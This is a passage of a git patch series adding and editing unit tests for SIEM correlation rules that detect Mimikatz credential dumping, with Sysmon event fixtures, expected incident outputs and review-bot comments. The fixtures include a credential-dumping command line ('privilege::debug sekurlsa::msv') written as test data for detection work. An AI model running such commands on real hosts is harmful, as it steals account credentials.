+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": \"2021-09-06T17:42:56.157650300Z\" }, \"EventRecordID\": \"1263128\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"1316\", \"ThreadID\": \"1724\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"Test_w7x64-131.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"Name\": \"RuleName\" }, { \"text\": \"2021-09-06 17:42:56.155\", \"Name\": \"UtcTime\" }, { \"text\": \"{7C221102-5320-6136-0000-00107650FA03}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"341952\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\", \"Name\": \"Image\" }, { \"text\": \"2.2.0.0\", \"Name\": \"FileVersion\" }, { \"text\": \"mimikatz for Windows\", \"Name\": \"Description\" }, { \"text\": \"mimikatz\", \"Name\": \"Product\" }, { \"text\": \"gentilkiwi (Benjamin DELPY)\", \"Name\": \"Company\" }, { \"text\": \"mimikatz.exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"\\\"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\\"\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"TESTLAB\\\\vasya\", \"Name\": \"User\" }, { \"text\": \"{7C221102-5246-6136-0000-0020E180F103}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x3f180e1\", \"Name\": \"LogonId\" }, { \"text\": \"2\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"High\", \"Name\": \"IntegrityLevel\" }, { \"text\": 
\"MD5=BB8BDB3E8C92E97E2F63626BC3B254C4,SHA256=912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\", \"Name\": \"Hashes\" }, { \"text\": \"{7C221102-52F8-6136-0000-00101D0BFA03}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"341612\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Name\": \"ParentCommandLine\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2021-09-06 17:42:56.155\\r\\nProcessGuid: {7C221102-5320-6136-0000-00107650FA03}\\r\\nProcessId: 341952\\r\\nImage: C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\r\\nFileVersion: 2.2.0.0\\r\\nDescription: mimikatz for Windows\\r\\nProduct: mimikatz\\r\\nCompany: gentilkiwi (Benjamin DELPY)\\r\\nOriginalFileName: mimikatz.exe\\r\\nCommandLine: \\\"C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\mimikatz.exe\\\"\\r\\nCurrentDirectory: C:\\\\Users\\\\vasya\\\\Desktop\\\\mimi\\\\x64\\\\\\r\\nUser: TESTLAB\\\\vasya\\r\\nLogonGuid: {7C221102-5246-6136-0000-0020E180F103}\\r\\nLogonId: 0x3f180e1\\r\\nTerminalSessionId: 2\\r\\nIntegrityLevel: High\\r\\nHashes: MD5=BB8BDB3E8C92E97E2F63626BC3B254C4,SHA256=912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9\\r\\nParentProcessGuid: {7C221102-52F8-6136-0000-00101D0BFA03}\\r\\nParentProcessId: 341612\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\nParentCommandLine: \\\"C:\\\\WINDOWS\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \", \"Level\": \"Information\", \"Task\": \"Process Create (rule: ProcessCreate)\", \"Opcode\": \"Info\", \"Channel\": null, \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", 
"datafield6": "7C221102-5246-6136-0000-0020E180F103", "event_src.category": "Other", "event_src.fqdn": "test_w7x64-131.testlab.org", "event_src.host": "test_w7x64-131.testlab.org", "event_src.hostname": "test_w7x64-131", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.privileges": "High", "object.account.session_id": "66158817", "object.process.cmdline": "\"C:\\Users\\vasya\\Desktop\\mimi\\x64\\mimikatz.exe\"", "object.process.cwd": "C:\\Users\\vasya\\Desktop\\mimi\\x64\\", "object.process.fullpath": "c:\\users\\vasya\\desktop\\mimi\\x64\\mimikatz.exe", "object.process.guid": "7C221102-5320-6136-0000-00107650FA03", "object.process.hash.md5": "BB8BDB3E8C92E97E2F63626BC3B254C4", "object.process.hash.sha256": "912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9", "object.process.id": "341952", "object.process.meta": "Description:mimikatz for Windows | Product:mimikatz | Company:gentilkiwi (Benjamin DELPY)", "object.process.name": "mimikatz.exe", "object.process.original_name": "mimikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "7C221102-52F8-6136-0000-00101D0BFA03", "object.process.parent.id": "341612", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": 
"c:\\users\\vasya\\desktop\\mimi\\x64\\", "object.process.version": "2.2.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2021-09-09T13:33:10Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "66158817", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-09-06T17:42:56.155Z", "type": "raw", "uuid": "7530d5f1-b693-4aec-8286-5694335292e9"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "datafield6": "7C221102-5246-6136-0000-0020E180F103", "event_src.fqdn": "test_w7x64-131.testlab.org", "event_src.host": "test_w7x64-131.testlab.org", "event_src.hostname": "test_w7x64-131", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|test_w7x64-131.testlab.org|synthetic:vasya@testlab", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.session_id": "66158817", "object.process.cmdline": "\"C:\\Users\\vasya\\Desktop\\mimi\\x64\\mimikatz.exe\"", "object.process.cwd": "C:\\Users\\vasya\\Desktop\\mimi\\x64\\", "object.process.fullpath": "c:\\users\\vasya\\desktop\\mimi\\x64\\mimikatz.exe", "object.process.guid": "7C221102-5320-6136-0000-00107650FA03", "object.process.hash.md5": "BB8BDB3E8C92E97E2F63626BC3B254C4", "object.process.hash.sha256": 
"912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9", "object.process.id": "341952", "object.process.meta": "Description:mimikatz for Windows | Product:mimikatz | Company:gentilkiwi (Benjamin DELPY)", "object.process.name": "mimikatz.exe", "object.process.original_name": "mimikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "7C221102-52F8-6136-0000-00101D0BFA03", "object.process.parent.id": "341612", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\vasya\\desktop\\mimi\\x64\\", "object.process.version": "2.2.0.0", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "66158817"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc new file mode 100644 index 00000000..748eb41e --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc 
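Review bot: test_2.sc is committed without a terminating newline (`\ No newline at end of file`), while test_1.sc and test_3.sc in the same patch end with one; add the final newline so the three files are consistent and a later edit to the `expect` line does not show up as a two-line change. Otherwise the file matches test_1.sc in shape: same rule name, same `incident.aggregation.timeout`, and the expect block repeats the event fields the rule is expected to pass through.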
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-15T09:53:08.1290798Z\"},\"EventRecordID\":\"21121982\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2984\",\"ThreadID\":\"1920\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"Win10x64-154.testlab.esc\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-05-15 09:53:08.126\",\"Name\":\"UtcTime\"},{\"text\":\"{63310a87-0104-6462-5d1f-000000001b00}\",\"Name\":\"ProcessGuid\"},{\"text\":\"3700\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\tools\\\\bibikatz_trunk\\\\x64\\\\bibikatz.exe\",\"Name\":\"Image\"},{\"text\":\"2.2.0.0\",\"Name\":\"FileVersion\"},{\"text\":\"custom file description\",\"Name\":\"Description\"},{\"text\":\"bibikatz\",\"Name\":\"Product\"},{\"text\":\"Custom company\",\"Name\":\"Company\"},{\"text\":\"bibikatz.exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"bibikatz.exe privilege::debug 
sekurlsa::msv\",\"Name\":\"CommandLine\"},{\"text\":\"C:\\\\tools\\\\bibikatz_trunk\\\\x64\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"TESTLAB\\\\vasya\",\"Name\":\"User\"},{\"text\":\"{63310a87-d18f-63d3-8410-0d0000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0xd1084\",\"Name\":\"LogonId\"},{\"text\":\"2\",\"Name\":\"TerminalSessionId\"},{\"text\":\"High\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=6EDAEB2D29A6B377A0A02C416E6B00D0,SHA256=609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78,IMPHASH=9528A0E91E28FBB88AD433FEABCA2456\",\"Name\":\"Hashes\"},{\"text\":\"{63310a87-fbe9-6461-8b1e-000000001b00}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"6728\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"ParentImage\"},{\"text\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\"Name\":\"ParentCommandLine\"},{\"text\":\"TESTLAB\\\\vasya\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "63310a87-d18f-63d3-8410-0d0000000000", "event_src.category": "Other", "event_src.fqdn": "win10x64-154.testlab.esc", "event_src.host": "win10x64-154.testlab.esc", "event_src.hostname": "win10x64-154", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.privileges": "High", "object.account.session_id": "856196", "object.process.cmdline": "bibikatz.exe privilege::debug sekurlsa::msv", "object.process.cwd": 
"C:\\tools\\bibikatz_trunk\\x64\\", "object.process.fullpath": "c:\\tools\\bibikatz_trunk\\x64\\bibikatz.exe", "object.process.guid": "63310a87-0104-6462-5d1f-000000001b00", "object.process.hash.imphash": "9528A0E91E28FBB88AD433FEABCA2456", "object.process.hash.md5": "6EDAEB2D29A6B377A0A02C416E6B00D0", "object.process.hash.sha256": "609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78", "object.process.id": "3700", "object.process.meta": "Description:custom file description | Product:bibikatz | Company:Custom company", "object.process.name": "bibikatz.exe", "object.process.original_name": "bibikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "63310a87-fbe9-6461-8b1e-000000001b00", "object.process.parent.id": "6728", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\tools\\bibikatz_trunk\\x64\\", "object.process.version": "2.2.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-05-15T09:57:43.023Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "856196", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-15T09:53:08.126Z", "type": "raw", "uuid": "b7b515f4-390a-4f87-9865-aafc6b6094ea"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "datafield6": "63310a87-d18f-63d3-8410-0d0000000000", "event_src.fqdn": "win10x64-154.testlab.esc", "event_src.host": "win10x64-154.testlab.esc", "event_src.hostname": "win10x64-154", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|win10x64-154.testlab.esc|synthetic:vasya@testlab", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:vasya@testlab", "object.account.name": "vasya", "object.account.session_id": "856196", "object.process.cmdline": "bibikatz.exe privilege::debug sekurlsa::msv", "object.process.cwd": "C:\\tools\\bibikatz_trunk\\x64\\", "object.process.fullpath": "c:\\tools\\bibikatz_trunk\\x64\\bibikatz.exe", "object.process.guid": "63310a87-0104-6462-5d1f-000000001b00", "object.process.hash.md5": "6EDAEB2D29A6B377A0A02C416E6B00D0", "object.process.hash.sha256": "609B0B3824A99FD78A5E18EDD3461976EB3D7304A2D377210E0F845CDF964D78", "object.process.id": "3700", "object.process.meta": "Description:custom file description | Product:bibikatz | Company:Custom company", "object.process.name": "bibikatz.exe", "object.process.original_name": "bibikatz.exe", "object.process.parent.cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "63310a87-fbe9-6461-8b1e-000000001b00", "object.process.parent.id": "6728", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": 
"c:\\tools\\bibikatz_trunk\\x64\\", "object.process.version": "2.2.0.0", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:vasya@testlab", "subject.account.name": "vasya", "subject.account.privileges": "High", "subject.account.session_id": "856196"} From d1843288404a4558e121ce8e1a02b30be8c626eb Mon Sep 17 00:00:00 2001 
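Review bot: test_3.sc, like test_1.sc and test_2.sc in this patch, is a positive case, so the Mimikatz rule now has three tests that all require a firing and none that requires silence; a change that broadens the rule's match condition would still pass the suite. test_3.sc is the most informative of the three because the binary is renamed (`bibikatz.exe`, custom Description and Company) and only the `privilege::debug sekurlsa::msv` arguments remain, which suggests the rule keys on the command line — a fourth test with a benign Sysmon EID 1 event from the same host, asserted with `expect not {"correlation_name": "Mimikatz"}` (the form PATCH 12 in this series uses for Mimikatz_Memssp_Default_Log_Detected), would pin the other side of that boundary. If the rule in fact matches on something else, pick the negative event to sit just outside that condition instead.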
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 19:18:26 +0300 Subject: [PATCH 12/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B8=D0=BB=20?= =?UTF-8?q?=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89=D0=B8?= =?UTF-8?q?=D0=B5=D1=81=D1=8F=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80?= =?UTF-8?q?=D0=B0=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE?= =?UTF-8?q?=D1=82=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6?= =?UTF-8?q?=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Mimikatz=5FMemssp=5FDef?= =?UTF-8?q?ault=5FLog=5FDetected)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Для второго модульного теста изменил "условие прохождение теста" на (expect not { "correlation_name": "Mimikatz_Memssp_Default_Log_Detected" } ) --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc | 5 +++-- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc | 4 ++-- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc | 3 --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc | 3 --- .../Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc | 3 --- 5 files changed, 5 insertions(+), 13 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_5.sc 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc
index 14c2b3d9..bdc118e7 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc
@@ -1,3 +1,4 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} +{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-09-11T12:10:22.3987265Z\"},\"EventRecordID\":\"385052\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3044\",\"ThreadID\":\"3900\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2020-09-11 12:10:22.357\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-672c-5f5b-0d00-00000000fc00}\"},{\"Name\":\"ProcessId\",\"text\":\"640\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Windows\\\\System32\\\\mimilsa.log\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2020-09-11 12:10:22.357\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", 
"recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} -expect 1 {"correlation_name": "Mimikatz_Memssp_Default_Log_Detected"} +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz_Memssp_Default_Log_Detected", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Mimikatz_Memssp_Default_Log_Detected|msedgewin10|640", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "file_object", "object.fullpath": "c:\\windows\\system32\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc
index 8655b8f8..eac5d631 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz_Memssp_Default_Log_Detected/tests/test_2.sc
@@ -1,4 +1,4 @@ -{"action": "create", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\windows\\syswow64\\mimilsa.log", "object.name": "mimilsa.log", "object.path": "c:\\windows\\syswow64\\", "object.property": "creation time", "object.value": "2020-09-11T12:10:22.357Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T22:55:13.304Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\syswow64\\lsass.exe", "subject.process.guid": "747f3d96-672c-5f5b-0d00-00000000fc00", "subject.process.id": "640", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\syswow64\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-09-11T12:10:22.357Z", "type": "raw", "uuid": "6fa098a5-aeab-446b-be9d-f11e3a9faa5a"} +{"action": "create", "body": 
